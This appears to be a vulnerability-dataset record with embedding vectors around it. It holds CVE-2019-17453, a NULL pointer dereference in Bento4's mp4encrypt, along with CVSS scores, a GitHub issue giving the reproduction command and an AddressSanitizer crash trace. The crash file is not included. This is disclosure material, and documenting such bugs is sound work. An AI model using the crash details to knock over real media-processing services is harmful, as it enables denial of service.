0.003627323778346181, -0.010624639689922333, 0.014149735681712627, -0.0017387536354362965, 0.006951489485800266, 0.0003538315067999065, -0.0057741072960197926, -0.013261411339044571, -0.0030121945310384035, -0.010998299345374107, -0.013346013613045216, 0.007303998805582523, 0.00017107732128351927, 0.006792860105633736, -0.007191195618361235, -0.002056893426924944, -0.0024605169892311096, 0.005580226890742779, 0.021023672074079514, -0.006070215255022049, -0.01975463703274727, 0.012034677900373936, 0.012323735281825066, 0.017216568812727928, 0.0066835819743573666, 0.013014654628932476, 0.01735757291316986, -0.0011606378247961402, 0.003054495668038726, 0.005851659458130598, -0.030344026163220406, -0.01507331058382988, -0.011618716642260551, 0.016497449949383736, 0.005841083824634552, 0.011371959932148457, 0.006514377426356077, 0.004684852436184883, 0.019867440685629845, 0.007219396531581879, 0.004822331480681896, -0.011089951731264591, -0.03268469125032425, -0.009045396000146866, 0.02261701598763466, 0.02144668437540531, -0.0015448733465746045, 0.00017548368487041444, 0.004942184779793024, -0.010384933091700077, -0.0031778740230947733, 0.004519172944128513, -0.003204312175512314, -0.006955014541745186, 0.01803439110517502, -0.001251409063115716, -0.009799767285585403, 0.0002445535210426897, 0.0037718527019023895, 0.0005719468463212252, 0.01653975062072277, 0.01735757291316986, 0.005118439439684153, 0.007155945058912039, -0.020657062530517578, -0.009553010575473309, 0.010913697071373463, -0.004677802324295044, -0.0061019412241876125, -0.009045396000146866, -0.019796939566731453, -0.01614493876695633, -0.004674277268350124, 0.006517902482300997, -0.0011421310482546687, -0.0010980673832818866, -0.001064579002559185, 0.0013509930577129126, 0.016285942867398262, 0.00181718694511801, 0.024266760796308517, 0.009362654760479927, 0.01803439110517502, -0.010307380929589272, 0.017583178356289864, -0.009538909420371056, -0.009609411470592022, -0.007254647556692362, -0.016920460388064384, -0.00802311860024929, 0.001706146402284503, -0.017019163817167282, -0.006087840534746647, -0.0015008095651865005, 0.01097009889781475, -0.0070114159025251865, 0.034940753132104874, -0.024858977645635605, 0.011371959932148457, -0.0005560839199461043, 0.023448938503861427, 0.010850245133042336, -0.020671162754297256, 0.018880413845181465, -0.012951202690601349, 0.00041508005233481526, -0.00781866256147623, 0.029610807076096535, -0.024774374440312386, 0.004906933754682541, -0.009355604648590088, 0.022631116211414337, -0.0035850226413458586, 0.01522841490805149, 0.051889412105083466, -0.009574160911142826, -0.020657062530517578, -0.00834742747247219, -0.0005635747220367193, 0.01842920109629631, 0.005527350585907698, 0.014276638627052307, 0.010829094797372818, -0.009454307146370411, 0.02309642918407917, 0.0024834300857037306, -0.0014232575194910169, 0.007177095394581556, 0.017399873584508896, 0.003230750560760498, -0.03350251168012619, 0.009976021945476532, 0.010737442411482334, -0.017484476789832115, -0.0035109955351799726, -0.003447543829679489, 0.01745627447962761, -0.014079233631491661, 0.015947533771395683, -0.016666654497385025, -0.01457979716360569, 0.007219396531581879, -0.021672289818525314, 0.0031902119517326355, 0.014142684638500214, 0.00425831601023674, 0.022743919864296913, -0.009489558637142181, -0.00819232314825058, -0.003493370022624731, 0.0144105926156044, 0.0033999551087617874, -0.005354620981961489, -0.008241674862802029, -0.0028236019425094128, -0.010011272504925728, 0.006309921853244305, 0.006056115031242371, 0.019148321822285652, 0.02270161733031273, 0.0002623993204906583, -0.029018590226769447, -0.025084583088755608, 0.009574160911142826, 0.019613634794950485, 0.01425548829138279, -0.013212059624493122, 0.006870412267744541, -0.006623655557632446, 0.009228701703250408, 0.01883811317384243, -0.04007329046726227, 0.0016294756205752492, 0.011541164480149746, -0.00021712387388106436, -0.038127437233924866, -0.011583465151488781, -0.008749288506805897, 0.03361531347036362, -0.0003851167275570333, -0.024788474664092064, 0.0031038469169288874, 0.008333327248692513, -0.0038388294633477926, 0.007416801992803812, 0.009644662961363792, 0.016990963369607925, -0.016257742419838905, 0.00011004909174516797, -0.009080647490918636, -0.007480253465473652, -0.01012407522648573, 0.007656508591026068, -0.007557805627584457, 0.002501055598258972, 0.0012408337788656354, 0.0072405473329126835, 0.004603775218129158, 0.015454020351171494, 0.027143239974975586, 0.005950361955910921, 0.00834742747247219, -0.015143812634050846, -0.0025274937506765127, -0.005544975865632296, 0.012041728012263775, -0.010102924890816212, -0.02237730845808983, -0.023900151252746582, 0.009390856139361858, -0.005513249896466732, 0.0037260265089571476, 0.002407640451565385, 0.021686390042304993, 0.007148894481360912, -0.02522558718919754, -0.014819503761827946, 0.0008786301477812231, 0.0021256329491734505, -0.013205009512603283, -0.0014505770523101091, -0.012859550304710865, 0.013959379866719246, -0.009722215123474598, 0.005844609346240759, -0.023702746257185936, 0.014389441348612309, 0.0189227145165205, -0.014875904656946659, -0.004952759947627783, -0.012358986772596836, -0.002881766064092517, -0.0017616667319089174, -0.005174840800464153, -0.005953887011855841, 0.007684709038585424, -0.01711786538362503, -0.01093484740704298, -0.001736109727062285, -0.01371967326849699, -0.007018466014415026, -0.018048491328954697, 0.0070572420954704285, -0.012027627788484097, 0.0073674507439136505, 0.008291025646030903, 0.004247740842401981, 0.028285369277000427, -0.010222778655588627, -0.0009870268404483795, 0.0035427215043455362, -0.0007556924247182906, 0.017413973808288574, -0.021728692576289177, 0.012457689270377159, 0.027636753395199776, -0.013092206791043282, -0.00016634046914987266, 0.0008424979168921709, 0.006151292473077774, 0.014107434079051018, -0.007353350054472685, 0.023293834179639816, 0.005996188148856163, 0.00687746237963438, 0.005837558768689632, -0.00018187292153015733, 0.013747874647378922, -0.00037211793824099004, 0.0023336135782301426, 0.011555264703929424, 0.015327117405831814, -0.0048646326176822186, 0.007060767151415348, 0.011125203222036362, 0.009524809196591377, 0.0009632324799895287, 0.0045262230560183525, 0.011668067425489426, 0.027820058166980743, 0.009898469783365726, -0.02932879887521267, 0.00901719555258751, 0.011400160379707813, -0.01179497130215168, -0.00448392191901803, -0.031725864857435226, -0.017258869484066963, 0.01180202141404152, -0.009891419671475887, 0.0134376659989357, 0.005368721205741167, 0.011181604117155075, 0.008171172812581062, 0.000013804330592392944, -0.01310630701482296, -0.0006393642979674041, -0.0033717541955411434, -0.01941622793674469, -0.007734060753136873, -0.033474311232566833, -0.013529318384826183, -0.004152562934905291, -0.009595311246812344, -0.0010566475102677941, -0.004885782953351736, 0.002749574836343527, -0.013007604517042637, 0.00803016871213913, 0.012690345756709576, 0.006821060553193092, 0.0032078372314572334, -0.004906933754682541, 0.021009571850299835, 0.00005012245674151927, -0.02030455321073532, 0.026339517906308174, -0.004850531928241253, 0.028468675911426544, 0.006168917752802372, -0.015905233100056648, -0.006214744411408901, 0.007790462113916874, -0.0036026481539011, -0.009165249764919281, 0.002629721537232399, -0.0065566785633563995, 0.01703326404094696, -0.009722215123474598, 0.006204168777912855, 0.005040887277573347, -0.012302584946155548, -0.017879286780953407, 0.0030650710687041283, 0.01420613657683134, 0.0018894514068961143, -0.0008081282721832395, 0.004191339015960693, -0.0046813273802399635, -0.012098129838705063, 0.0023935402277857065, 0.029751809313893318, 0.005837558768689632, 0.02932879887521267, 0.005844609346240759, -0.002936404896900058, 0.007480253465473652, -0.0030051444191485643, -0.021770993247628212, 0.025112783536314964, -0.0035339086316525936, 0.0261280108243227, -0.015383519232273102, -0.00017977989045903087, 0.001742278691381216, -0.003979833330959082, -0.02556399628520012, -0.01761137880384922, 0.01825999654829502, -0.0031884494237601757, 0.009306252934038639, 0.004325293004512787, 0.008255775086581707, -0.0020057796500623226, -0.009863218292593956, 0.0005710655241273344, 0.008340377360582352, -0.0018559630261734128, -0.0062887710519135, 0.012499989941716194, 0.017329372465610504, 0.029695408418774605, 0.02704453654587269, 0.0004009796539321542, 0.009355604648590088, -0.007480253465473652, -0.005206566769629717, -0.00999012216925621, -0.013656222261488438, -0.017484476789832115, 0.0012866600882261992, 0.009531859308481216, 0.012690345756709576, 0.003641424234956503, -0.010145226493477821, -0.019444430246949196, 0.019782839342951775, 0.014678499661386013, -0.004988010972738266, 0.019444430246949196, 0.0010099400533363223, -0.0032730516977608204, 0.005999713204801083, 0.022461911663413048, -0.007159470114856958, -0.00753665529191494, 0.003401717636734247, -0.004357018508017063, 0.011287357658147812, 0.016567951068282127, 0.02745344676077366, 0.0074379523284733295, 0.0026173838414251804, 0.017146067693829536, -0.003290677210316062, -0.006158342584967613, 0.00025226466823369265, 0.01834459975361824, -0.0005525588057935238, 0.02466157078742981, -0.0027672003488987684, 0.0028570902068167925, 0.004769454710185528, 0.00018782152619678527, -0.008234623819589615, 0.007318099495023489, 0.0035268585197627544, -0.03254368528723717, 0.009433156810700893, 0.0021097699645906687, 0.00590101070702076, 0.023082328960299492, -0.009764515794813633, -0.0014109197072684765, -0.014932306483387947, 0.021263379603624344, 0.009327404201030731, -0.014551595784723759, -0.014805403538048267, -0.04117312282323837, 0.00023221569426823407, -0.0012778473319485784, -0.013240260072052479, 0.032712891697883606, -0.006947963964194059, -0.011893673799932003, -0.005298219155520201, 0.017244769260287285, -0.0014435268240049481, 0.008544832468032837, -0.0039058064576238394, -0.01031443104147911, 0.03200787305831909, 0.029385199770331383, -0.014438793063163757, 0.002070993883535266, 0.0025451192632317543, -0.03471514582633972, -0.017992090433835983, 0.0038987561129033566, 0.005714180413633585, -0.0006600742344744503, -0.015778329223394394, -0.01372672338038683, -0.006440350320190191, -0.006768184248358011, -0.004004509188234806, -0.006486176513135433, -0.003849404864013195, -0.014325990341603756, -0.005396922118961811, -0.023871950805187225, -0.023547641932964325, -0.005989138036966324, 0.0022225729189813137, 0.012069928459823132, -0.028144367039203644, -0.020262252539396286, -0.0074661532416939735, -0.006514377426356077, 0.016765356063842773, 0.011153403669595718, -0.005830508656799793, -0.010554137639701366, -0.04125772416591644, 0.010476585477590561, -0.011125203222036362, -0.009729265235364437, 0.007776361890137196, 0.03423573076725006, -0.016257742419838905, 0.004603775218129158, -0.013423565775156021, -0.007917365990579128, -0.0012029389617964625, -0.006680056918412447, 0.02662152424454689, 0.0029240672010928392, -0.013663272373378277, 0.00867878645658493, 0.015369418077170849, 0.0036167483776807785, -0.005047937389463186, -0.012633943930268288, -0.0025786077603697777, 0.005700080189853907, -0.000044586955482373014, -0.024788474664092064, -0.001981104025617242, -0.019204722717404366, 0.001713196630589664, 0.015327117405831814, -0.007924416102468967, -0.004053860437124968, -0.0009482508176006377, 0.02072756364941597, 0.008262825198471546, -0.0015695489710196853, 0.012965302914381027, -0.013973480090498924, -0.0012381899869069457, 0.002828889526426792, -0.023956552147865295, 0.013945279642939568, -0.016285942867398262, -0.000171187479281798, 0.0019493780564516783, -0.00638747401535511, -0.032712891697883606, -0.021770993247628212, 0.01457979716360569, 0.012358986772596836, -0.01720246858894825, -0.007910314947366714, 0.003147910814732313, -0.016187241300940514, 0.020939070731401443, 0.002525731222704053, -0.0006909188232384622, 0.01441764272749424, -0.026903532445430756, -0.005724756047129631, 0.007127744145691395, 0.0322616770863533, 0.03809923678636551, -0.019599534571170807, -0.010913697071373463, -0.002844752511009574, -0.01307105552405119, 0.013776075094938278, -0.009567110799252987, -0.020445557311177254, 0.01630004309117794, -0.04506482556462288, -0.007790462113916874, 0.01613083854317665, 0.02023405022919178, 0.015750128775835037, -0.009637612849473953, -0.004631976131349802, -0.0006658025085926056, -0.009560060687363148, 0.0012989979004487395, 0.006172443274408579, 0.0007953497697599232, -0.013663272373378277, -0.014029881916940212, 0.000863648543599993, 0.0025327815674245358, -0.024619270116090775, 0.050084564834833145, -0.00622179452329874, 0.025422992184758186, 0.021658189594745636, -0.0012910664081573486, -0.0002679073077160865, 0.010864346288144588, -0.010525936260819435, 0.008001968264579773, 0.017146067693829536, 0.00590101070702076, -0.004924559034407139, -0.005213616881519556, 0.002851802622899413, -0.00148935301695019, 0.006295821629464626, -0.005527350585907698, 0.009701063856482506, 0.00815707165747881, 0.006496751680970192, -0.01224618311971426, -0.003722501453012228, 0.02179919369518757, -0.01776648312807083, 0.004614350851625204, 0.016088537871837616, 0.0073392498306930065, -0.012358986772596836, 0.01327551156282425, -0.017653681337833405, 0.032064273953437805, -0.009553010575473309, -0.016201341524720192, 0.005724756047129631, 0.008107720874249935, 0.012175681069493294, 0.0031990245915949345, 0.01113930344581604, 0.0027055111713707447, -0.002444654004648328, 0.01277494803071022, -0.0014981657732278109, -0.010406083427369595, -0.006366323214024305, 0.0017554977675899863, 0.004367594141513109, 0.004959810059517622, 0.015002808533608913, 0.015848832204937935, 0.02275802008807659, 0.016173141077160835, -0.00048734451411291957, -0.00008763168443692848, -0.0014479331439360976, -0.009122948162257671, 0.013670322485268116, 0.011407210491597652, -0.019134221598505974, 0.008869141340255737, -0.014988708309829235, 0.0005741500062867999, -0.015595024451613426, -0.011703318916261196, 0.017216568812727928, -0.030118420720100403, 0.0006296702777035534, 0.00026834793970920146, 0.003782428102567792, -0.01631414331495762, 0.01900731772184372, 0.014403542503714561, -0.0021555961575359106, -0.010011272504925728, 0.014988708309829235, 0.0013210297329351306, -0.017879286780953407, 0.009820917621254921, -0.0045826248824596405, -0.010039472952485085, -0.003912856336683035, -0.01241538766771555, -0.012232082895934582, 0.019303426146507263, -0.006539053283631802, 0.005100813694298267, -0.003941057249903679, 0.000040125505620380864, 0.020600661635398865, -0.003424630733206868, 0.014988708309829235, 0.025789601728320122, -0.001281372387893498, -0.01866890862584114, -0.0099478205665946, 0.006278195884078741, -0.0014012256870046258, -0.008862091228365898, -0.020445557311177254, 0.009602361358702183, 0.02047375775873661, 0.004843481816351414, -0.00018231355352327228, -0.029356999322772026, 0.01027917955070734, 0.012485889717936516, 0.003149673342704773, 0.011019449681043625, -0.009285102598369122, -0.01917652226984501, 0.03209247440099716, -0.0132261598482728, -0.01604623720049858, -0.007194720674306154, 0.00045738121843896806, 0.013120407238602638, 0.006634230725467205, -0.004392269533127546, -0.015609124675393105, 0.007804562337696552, 0.011054701171815395, -0.021658189594745636, -0.0020586559548974037, 0.0068563115783035755, 0.020854467526078224, 0.006898612715303898, -0.020953170955181122, 0.015552723780274391, 0.02423856034874916, -0.0020903819240629673, 0.005273543763905764, 0.02357584238052368, -0.014805403538048267, 0.018527904525399208, 0.01858430542051792, 0.022067101672291756, 0.010067674331367016, -0.023702746257185936, 0.016426946967840195, -0.003202549647539854, -0.0039269570261240005, 0.017089664936065674, 0.04717988520860672, -0.006179493386298418, 0.001706146402284503, 0.00046355012455023825, 0.0019176522037014365, 0.0057459063827991486, 0.014241388067603111, 0.0013606870779767632, -0.010878446511924267, 0.011245056055486202, -0.005925686564296484, 0.019599534571170807, 0.004952759947627783, -0.0003476626006886363, 0.0020057796500623226, -0.007804562337696552, 0.017019163817167282, -0.006521427538245916, 0.0067858099937438965, -0.003870555432513356, 0.03592777997255325, -0.009433156810700893, 0.014692599885165691, 0.014142684638500214, 0.014932306483387947, -0.0028482775669544935, -0.009271002374589443, 0.02179919369518757, -0.00982796773314476, -0.018809912726283073, -0.0049809603951871395, 0.0023635767865926027, -0.017413973808288574, 0.011710369028151035, -0.017343472689390182, 0.01809079200029373, -0.029469802975654602, 0.01077974308282137, 0.018739409744739532, 0.015002808533608913, 0.02423856034874916, -0.012499989941716194, 0.005982087925076485, 0.041737135499715805, -0.0021926097106188536, -0.017822885885834694, -0.004624926019459963, 0.026395918801426888, -0.0015157912857830524, -0.010208678431808949, -0.02442186512053013, 0.03299489989876747, 0.010568237863481045, -0.00917229987680912, 0.0028835285920649767, 0.024280861020088196, 0.00019277867977507412, 0.020755765959620476, -0.02366044372320175, 0.004931609146296978, -0.013825426809489727, -0.011653967201709747, 0.018401000648736954 ]
62
CVE-2019-17453
2019-10-10T17:15:17.843000
Bento4 1.5.1.0 has a NULL pointer dereference in AP4_DescriptorListWriter::Action in Core/Ap4Descriptor.h, related to AP4_IodsAtom::WriteFields in Core/Ap4IodsAtom.cpp, as demonstrated by mp4encrypt or mp4compact.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/436" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/437" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "83B32974-D913-4DDB-844F-C58D55ECC17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/437
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
**System Details** Commit ID: bc1b02a Test Machine : Ubuntu 16.04.3 LTS MP4 Encrypter - Version 1.6 (Bento4 Version 1.5.1.0) **Command** mp4encrypt --method OMA-PDCF-CBC --show-progress POC /dev/null **ASAN Output** ``` fuzzer@thickfuzzer:~/victim/Bento4$ ./mp4encrypt --method OMA-PDCF-CBC --show-progress /home/fuzzer/victim/Bento4/cmakebuild/out3/4/crashes/unique/manul-1569860171-4-14003_id5_1.mp4 /dev/null WARNING: track ID 1 will not be encrypted ASAN:DEADLYSIGNAL ================================================================= ==11724==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000005a42f4 bp 0x7ffdb06d0290 sp 0x7ffdb06d01b0 T0) #0 0x5a42f3 in AP4_DescriptorListWriter::Action(AP4_Descriptor*) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Descriptor.h:108:16 #1 0x6c7886 in AP4_List<AP4_Descriptor>::Apply(AP4_List<AP4_Descriptor>::Item::Operator const&) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4List.h:353:9 #2 0x6c7886 in AP4_InitialObjectDescriptor::WriteFields(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4ObjectDescriptor.cpp:300 #3 0x5ff8a8 in AP4_Expandable::Write(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Expandable.cpp:105:5 #4 0x5ebc24 in AP4_IodsAtom::WriteFields(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4IodsAtom.cpp:99:36 #5 0x5961a1 in AP4_Atom::Write(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:229:14 #6 0x59b9b2 in AP4_AtomListWriter::Action(AP4_Atom*) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:753:5 #7 0x587216 in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4List.h:353:9 #8 0x587216 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:232 #9 0x5961a1 in AP4_Atom::Write(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:229:14 #10 0x59b9b2 in AP4_AtomListWriter::Action(AP4_Atom*) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:753:5 #11 0x5b092e in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4List.h:353:9 #12 0x5b092e in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Processor.cpp:644 #13 0x529852 in main /home/fuzzer/victim/Bento4/Source/C++/Apps/Mp4Encrypt/Mp4Encrypt.cpp:654:18 #14 0x7fdf1c6f482f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 #15 0x451428 in _start (/home/fuzzer/victim/Bento4/mp4encrypt+0x451428) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Descriptor.h:108:16 in AP4_DescriptorListWriter::Action(AP4_Descriptor*) const ==11724==ABORTING ```
SEGV in mp4encrypt
https://api.github.com/repos/axiomatic-systems/Bento4/issues/437/comments
0
2019-09-30T16:31:42
2019-10-08T05:14:30Z
https://github.com/axiomatic-systems/Bento4/issues/437
500,387,590
437
true
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : SEGV in mp4encrypt Issue date: --- start body --- **System Details** Commit ID: bc1b02a Test Machine : Ubuntu 16.04.3 LTS MP4 Encrypter - Version 1.6 (Bento4 Version 1.5.1.0) **Command** mp4encrypt --method OMA-PDCF-CBC --show-progress POC /dev/null **ASAN Output** ``` fuzzer@thickfuzzer:~/victim/Bento4$ ./mp4encrypt --method OMA-PDCF-CBC --show-progress /home/fuzzer/victim/Bento4/cmakebuild/out3/4/crashes/unique/manul-1569860171-4-14003_id5_1.mp4 /dev/null WARNING: track ID 1 will not be encrypted ASAN:DEADLYSIGNAL ================================================================= ==11724==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000005a42f4 bp 0x7ffdb06d0290 sp 0x7ffdb06d01b0 T0) #0 0x5a42f3 in AP4_DescriptorListWriter::Action(AP4_Descriptor*) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Descriptor.h:108:16 #1 0x6c7886 in AP4_List<AP4_Descriptor>::Apply(AP4_List<AP4_Descriptor>::Item::Operator const&) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4List.h:353:9 #2 0x6c7886 in AP4_InitialObjectDescriptor::WriteFields(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4ObjectDescriptor.cpp:300 #3 0x5ff8a8 in AP4_Expandable::Write(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Expandable.cpp:105:5 #4 0x5ebc24 in AP4_IodsAtom::WriteFields(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4IodsAtom.cpp:99:36 #5 0x5961a1 in AP4_Atom::Write(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:229:14 #6 0x59b9b2 in AP4_AtomListWriter::Action(AP4_Atom*) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:753:5 #7 0x587216 in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4List.h:353:9 #8 0x587216 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:232 #9 0x5961a1 in AP4_Atom::Write(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:229:14 #10 0x59b9b2 in AP4_AtomListWriter::Action(AP4_Atom*) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:753:5 #11 0x5b092e in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4List.h:353:9 #12 0x5b092e in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Processor.cpp:644 #13 0x529852 in main /home/fuzzer/victim/Bento4/Source/C++/Apps/Mp4Encrypt/Mp4Encrypt.cpp:654:18 #14 0x7fdf1c6f482f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 #15 0x451428 in _start (/home/fuzzer/victim/Bento4/mp4encrypt+0x451428) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Descriptor.h:108:16 in AP4_DescriptorListWriter::Action(AP4_Descriptor*) const ==11724==ABORTING ``` --- end body ---
3,188
[ -0.025401856750249863, 0.04068894684314728, -0.004482680466026068, -0.0066054887138307095, 0.05336114019155502, -0.0007004188373684883, -0.038878634572029114, 0.04002803936600685, -0.029884537681937218, 0.030171887949109077, -0.006346872542053461, 0.003604463068768382, -0.00040678170626051724, 0.005229793954640627, 0.02851961925625801, 0.00411271583288908, -0.022427771240472794, 0.00048715027514845133, -0.021292733028531075, -0.03396492451429367, 0.029338570311665535, -0.04175214841961861, 0.014223890379071236, 0.01646522991359234, -0.0142957279458642, 0.018376117572188377, -0.020387576892971992, 0.020373208448290825, 0.009547247551381588, 0.025804148986935616, -0.023462235927581787, 0.013333101756870747, -0.01807439886033535, 0.01472675520926714, 0.0379878431558609, -0.0010200971737504005, 0.052154265344142914, 0.04071768373250961, -0.010883430950343609, 0.03077532723546028, 0.014439404010772705, -0.06419428437948227, -0.04603368043899536, 0.030746592208743095, -0.004349780734628439, 0.021795596927404404, -0.0020940727554261684, -0.020847339183092117, -0.02387889474630356, 0.011601809412240982, 0.010897798463702202, -0.03212587907910347, -0.031177617609500885, -0.06022883579134941, 0.023390397429466248, -0.027988018468022346, 0.02018642984330654, 0.006490548141300678, 0.0011134863598272204, 0.022327197715640068, -0.03367757424712181, -0.0031913956627249718, 0.0036457697860896587, 0.035545360296964645, 0.018692202866077423, 0.014841696247458458, 0.00826135091483593, -0.005078934598714113, -0.019827241078019142, 0.016565803438425064, -0.033074136823415756, -0.03192473202943802, 0.02295937016606331, 0.02119215950369835, -0.005211834795773029, -0.010279993526637554, 0.06948155164718628, 0.025229446589946747, -0.03545915335416794, 0.029769597575068474, -0.028404677286744118, 0.03077532723546028, -0.04333258047699928, 0.034913185983896255, 0.04433830827474594, -0.017427857965230942, -0.053562287241220474, -0.06701032817363739, -0.02534438669681549, -0.027169067412614822, 0.009417939931154251, 0.012736847624182701, 0.03310287371277809, 0.015516971237957478, -0.008340371772646904, 0.012535701505839825, -0.028505250811576843, -0.025401856750249863, -0.06643562763929367, -0.04689573496580124, -0.039855629205703735, -0.01800256036221981, 0.004475496709346771, 0.007194558624178171, -0.0029812699649482965, 0.0182324405759573, 0.008311636745929718, -0.007399296388030052, 0.04111997410655022, 0.1301126778125763, 0.008376291021704674, 0.012341739609837532, 0.011838874779641628, -0.004439577925950289, -0.003807405009865761, -0.0035505846608430147, -0.0015211660647764802, -0.014798592776060104, -0.024898992851376534, -0.017341652885079384, -0.0019019065657630563, -0.04048779979348183, 0.002625672612339258, 0.019726667553186417, -0.022916268557310104, 0.053705960512161255, -0.0074280318804085255, 0.009927988052368164, -0.004884972702711821, -0.01956862583756447, -0.048476167023181915, -0.011386295780539513, 0.006659367121756077, -0.013031382113695145, -0.0048095425590872765, -0.003586503677070141, -0.025875987485051155, 0.013613268733024597, 0.006799450609833002, 0.009360468946397305, -0.07660786062479019, -0.003810996888205409, 0.02068929560482502, 0.03077532723546028, -0.010610447265207767, -0.0063971588388085365, 0.01821807399392128, 0.0015202680369839072, -0.007614810019731522, 0.013333101756870747, -0.008340371772646904, -0.0014915330102667212, 0.009877701289951801, 0.006447445135563612, 0.039855629205703735, 0.01464773342013359, 0.00490652397274971, 0.02274385653436184, 0.018878981471061707, -0.026292646303772926, 0.0005051097250543535, -0.019108863547444344, 0.027873078361153603, -0.0357465036213398, 0.015660647302865982, -0.009295815601944923, 0.03600512072443962, 0.02096227928996086, 0.003979815635830164, 0.031953465193510056, 0.003782261861488223, -0.0013828782830387354, 0.025387490168213844, 0.021924905478954315, -0.044654395431280136, -0.018950819969177246, 0.022442137822508812, 0.022284094244241714, -0.039022307842969894, -0.00418096175417304, -0.006684510037302971, 0.00490652397274971, 0.01175985299050808, 0.004902931861579418, 0.030315564945340157, -0.010287177748978138, 0.03295919671654701, -0.07235506176948547, 0.033993661403656006, -0.005772169679403305, 0.019022658467292786, 0.024697845801711082, 0.004673050716519356, -0.023059943690896034, 0.03804531693458557, 0.004281534813344479, -0.012521333992481232, -0.043964751064777374, -0.022786960005760193, 0.011881977319717407, 0.017629003152251244, -0.0043282294645905495, 0.002147951163351536, -0.006702469661831856, -0.0241518784314394, 0.006691693793982267, -0.027427684515714645, 0.0457463301718235, 0.012485414743423462, -0.004669459071010351, -0.03008568286895752, -0.029884537681937218, 0.018117500469088554, 0.012226798571646214, -0.011982549913227558, -0.01468365266919136, -0.03528674319386482, 0.026594365015625954, -0.006102623883634806, 0.010071664117276669, 0.03586144372820854, -0.00808893982321024, 0.004188145510852337, -0.017672106623649597, -0.04407969117164612, -0.006422302220016718, -0.0030764550901949406, 0.037528082728385925, 0.00787342619150877, -0.01587616093456745, 0.03376378118991852, 0.03683843836188316, -0.020746765658259392, 